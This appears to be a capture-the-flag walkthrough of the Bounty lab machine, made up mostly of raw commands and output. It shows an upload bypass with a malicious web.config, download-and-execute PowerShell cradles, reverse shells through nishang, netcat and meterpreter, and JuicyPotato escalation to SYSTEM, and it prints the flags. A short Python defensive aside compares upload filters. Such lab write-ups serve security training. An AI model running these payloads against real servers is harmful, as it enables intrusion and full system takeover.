nmap -sC -sV 10.10.10.93
Nmap scan report for 10.10.10.93
Host is up (0.099s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
ffuf -u http://10.10.10.93/FUZZ.aspx -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-words.txt
:: Method : GET
:: URL : http://10.10.10.93/FUZZ.aspx
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-words.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
[Status: 200, Size: 941, Words: 89, Lines: 22, Duration: 125ms]
* FUZZ: transfer
msfvenom -p windows/shell/reverse_tcp LHOST=10.10.14.10 LPORT=9999 -f aspx > shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of aspx file: 2889 bytes
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.10
LHOST => 10.10.14.10
msf6 exploit(multi/handler) > set LPORT 9999
LPORT => 9999
msf6 exploit(multi/handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.10:9999
#intercept the traffic with burp
#send the traffic to the intruder
#filename= "test.FUZZ"
#select seclists/Discovery/Web-Content/raft-small-words-lowercase.txt as payload
#analyze the length of the result
POST /transfer.aspx HTTP/1.1
Host: 10.10.10.93
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------133661013821714142042995077179
Content-Length: 843
Origin: http://10.10.10.93
Connection: close
Referer: http://10.10.10.93/transfer.aspx
Upgrade-Insecure-Requests: 1
-----------------------------133661013821714142042995077179
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKMTI3ODM5MzQ0Mg9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYCAgUPDxYGHgRUZXh0BR5JbnZhbGlkIEZpbGUuIFBsZWFzZSB0cnkgYWdhaW4eCUZvcmVDb2xvcgqNAR4EXyFTQgIEZGRk8VjbSvn+LXz7RzVAc6h24qWeuwo=
-----------------------------133661013821714142042995077179
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWAgKBgcHqBgLt3oXMA5qrpkoEt38KIBsq9IVcGsd80Cs+
-----------------------------133661013821714142042995077179
Content-Disposition: form-data; name="FileUpload1"; filename="test.config"
Content-Type: text/plain
test
-----------------------------133661013821714142042995077179
Content-Disposition: form-data; name="btnUpload"
Upload
-----------------------------133661013821714142042995077179--
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 20 Apr 2023 13:10:43 GMT
Connection: close
Content-Length: 1110
*
*snipped
*
File uploaded successfully.
*
*snipped
*
vim ../nishang/Shells/Invoke-PowerShellTcp.ps1
#added at the end of the file
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.10 -Port 9898
nc -lvnp 9898
listening on [any] 9898 ...
tail -2 Invoke-PowerShellTcp.ps1
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.10 -Port 9898
tail -3 web.config
Set obj = CreateObject("WScript.Shell")
obj.Exec("cmd /c powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.14.10:9998/Invoke-PowerShellTcp.ps1')")
%>
python -m http.server 9998
Serving HTTP on 0.0.0.0 port 9998 (http://0.0.0.0:9998/) ...
#upload web.config file
#visit 10.10.10.93/uploadedfiles/web.config
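As an added illustration (not the Bounty application's code, whose filter is not shown on the page), a Python model of the upload check behind transfer.aspx: a blocklist of script extensions lets test.config and web.config through, while an allowlist that also rejects IIS-reserved file names does not. The extension sets and reserved-name list are assumptions.

```python
"""Model of the transfer.aspx upload check (constructed example, not the
real handler). Shows why a blocklist-style extension filter accepts a
web.config, which IIS then treats as an executable ASP file."""
from pathlib import PureWindowsPath

# Extensions a blocklist author typically remembers to reject (assumed set).
SCRIPT_EXTENSIONS = {".aspx", ".asp", ".ashx", ".asmx", ".php", ".exe"}

# Extensions the application actually has a business need for (assumed set).
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif", ".pdf"}

# File names IIS interprets specially regardless of extension (assumed list).
RESERVED_NAMES = {"web.config", "global.asax"}


def _basename(filename: str) -> str:
    """Strip any directory part the client put in the multipart filename.
    PureWindowsPath treats both '/' and '\\' as separators."""
    return PureWindowsPath(filename).name.lower()


def blocklist_allows(filename: str) -> bool:
    """Vulnerable form: rejects known script extensions, passes everything else."""
    name = _basename(filename)
    ext = name[name.rfind("."):] if "." in name else ""
    return ext not in SCRIPT_EXTENSIONS


def allowlist_allows(filename: str) -> bool:
    """Hardened form: exactly one extension, from an explicit list, and never
    a name the web server itself reads as configuration or code."""
    name = _basename(filename)
    if name in RESERVED_NAMES or name.count(".") != 1:
        return False  # reserved name, no extension, or double extension
    ext = name[name.rfind("."):]
    return ext in ALLOWED_EXTENSIONS


if __name__ == "__main__":
    for candidate in ("photo.png", "shell.aspx", "test.config", "web.config"):
        print(f"{candidate:12} blocklist={blocklist_allows(candidate)!s:5} "
              f"allowlist={allowlist_allows(candidate)}")
```

The name check is only half the fix: the upload directory should also have script-handler execution disabled in IIS, since that is what turns an uploaded web.config into code.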
python -m http.server 9998
Serving HTTP on 0.0.0.0 port 9998 (http://0.0.0.0:9998/) ...
10.10.10.93 - - [20/Apr/2023 09:31:12] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -
nc -lvnp 9898
listening on [any] 9898 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.93] 49158
Windows PowerShell running as user BOUNTY$ on BOUNTY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\windows\system32\inetsrv>whoami
bounty\merlin
PS C:\windows\system32\inetsrv> cd C:\users\merlin\desktop
PS C:\users\merlin\desktop> attrib
A SH C:\users\merlin\desktop\desktop.ini
A HR C:\users\merlin\desktop\user.txt
PS C:\users\merlin\desktop> type user.txt
6f9be0e21f1beae7e333e8ff3cbaa86c
PS C:\> systeminfo
Host Name: BOUNTY
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-402-3606965-84760
Original Install Date: 5/30/2018, 12:22:24 AM
System Boot Time: 4/20/2023, 2:46:22 PM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,520 MB
Virtual Memory: Max Size: 4,095 MB
Virtual Memory: Available: 3,532 MB
Virtual Memory: In Use: 563 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.93
#saved as sysinfo.txt
python2 windows-exploit-suggester.py --database 2023-04-18-mssb.xls --systeminfo sysinfo.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
#DID NOT GET USEFUL INFO
powershell -exec bypass -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.10:9998/winPEAS.bat','C:\\Windows\\Temp\\winPEAS.bat')";
PS C:\Windows\Temp> .\winPEAS.bat
.
.Snipped
.
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
.
.Snipped
.
ROGUE POTATO
powershell -exec bypass -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.10:9998/RoguePotato.exe','C:\\Windows\\Temp\\RoguePotato.exe')"
powershell -exec bypass -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.10:9998/chisel.exe','C:\\Windows\\Temp\\chisel.exe')"
#second reverse shell
powershell -exec bypass -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.10:9998/Invoke-PowerShellTcpOneLine.ps1','C:\\Windows\\Temp\\Invoke-PowerShellTcpOneLine.ps1')"
powershell.exe -exec bypass -WindowStyle Hidden -NoLogo -file "Invoke-PowerShellTcpOneLine.ps1"
nc -lvnp 9899
listening on [any] 9899 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.93] 49186
PS C:\windows\temp> id
PS C:\windows\temp> whoami
bounty\merlin
chisel server --reverse --port 8000
server: Reverse tunnelling enabled
server: Listening on http://0.0.0.0:8000
#victim machine
.\chisel.exe client 10.10.14.10:8000 R:9999:localhost:9999
#attacker machine
sudo socat tcp-listen:135,reuseaddr,fork tcp:127.0.0.1:9999
powershell -exec bypass -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.10:9998/Invoke-PowerShellTcpOneLine_potato.ps1','C:\\Windows\\Temp\\Invoke-PowerShellTcpOneLine_potato.ps1')"
"powershell.exe -exec bypass -WindowStyle Hidden -NoLogo -file C:\\Windows\\Temp\\Invoke-PowerShellTcpOneLine_potato.ps1"
PS C:\windows\temp> .\RoguePotato.exe -r 10.10.14.10 -e "powershell -exec bypass -WindowStyle Hidden -NoLogo C:\Windows\Temp\Invoke-PowerShellTcpOneLine_potato.ps1" -l 9999
[+] Starting RoguePotato...
[*] Creating Rogue OXID resolver thread
[*] Creating Pipe Server thread..
[*] Creating TriggerDCOM thread...
[*] Listening on pipe \\.\pipe\RoguePotato\pipe\epmapper, waiting for client to connect
[*] Calling CoGetInstanceFromIStorage with CLSID:{4991d34b-80a1-4291-83b6-3328366b9097}
[*] Starting RogueOxidResolver RPC Server listening on port 9999 ...
[*] IStoragetrigger written:104 bytes
[*] SecurityCallback RPC call
[*] ResolveOxid2 RPC call, this is for us!
[*] ResolveOxid2: returned endpoint binding information = ncacn_np:localhost/pipe/RoguePotato[\pipe\epmapper]
[-] Named pipe didn't received any connect request. Exiting ...
#It did not work out because the SMB service is not running. RoguePotato needs SMB for exploitation.
METASPLOIT EXPLOIT SUGGESTER
powershell -exec bypass -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.10:9998/reverse.exe','C:\\Windows\\Temp\\reverse.exe')"
.\reverse.exe
msf6 exploit(multi/handler) > set LHOST 10.10.14.10
LHOST => 10.10.14.10
msf6 exploit(multi/handler) > set LPORT 7878
LPORT => 7878
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.10:7878
[*] Sending stage (175686 bytes) to 10.10.10.93
[*] Meterpreter session 1 opened (10.10.14.10:7878 -> 10.10.10.93:49224) at 2023-04-20 11:42:55 -0400
meterpreter > getuid
Server username: BOUNTY\merlin
meterpreter > ps
2300 1244 w3wp.exe x64 0 BOUNTY\merlin C:\Windows\System32\inetsrv\w3wp.exe
meterpreter > migrate 2300
[*] Migrating from 1704 to 2300...
[*] Migration completed successfully.
meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) >
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.93 - 183 exploit checks are being tried...
[-] 10.10.10.93 - Post interrupted by the console user
[*] Post module execution completed
#DID NOT WORK
JUICY POTATO
PS C:\windows\temp> powershell -exec bypass -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.10:9998/nc64.exe','C:\\Windows\\Temp\\nc64.exe')"
PS C:\windows\temp> powershell -exec bypass -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.10:9998/JuicyPotato.exe','C:\\Windows\\Temp\\JuicyPotato.exe')"
.\JuicyPotato.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c C:\\Windows\\Temp\\nc64.exe -e cmd.exe 10.10.14.10 7777" -t *
nc -lvnp 7777
listening on [any] 7777 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.93] 49243
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Users\Administrator\Desktop>type root.txt
type root.txt
fac3997f42dc78a170642d3a11d9e0bb
References
https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/iis-internet-information-services
https://github.com/d4t4s3c/Offensive-Reverse-Shell-Cheat-Sheet/blob/master/web.config
https://ohpe.it/juicy-potato/CLSID/Windows_Server_2012_Datacenter/
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/juicypotato
https://github.com/antonioCoco/RoguePotato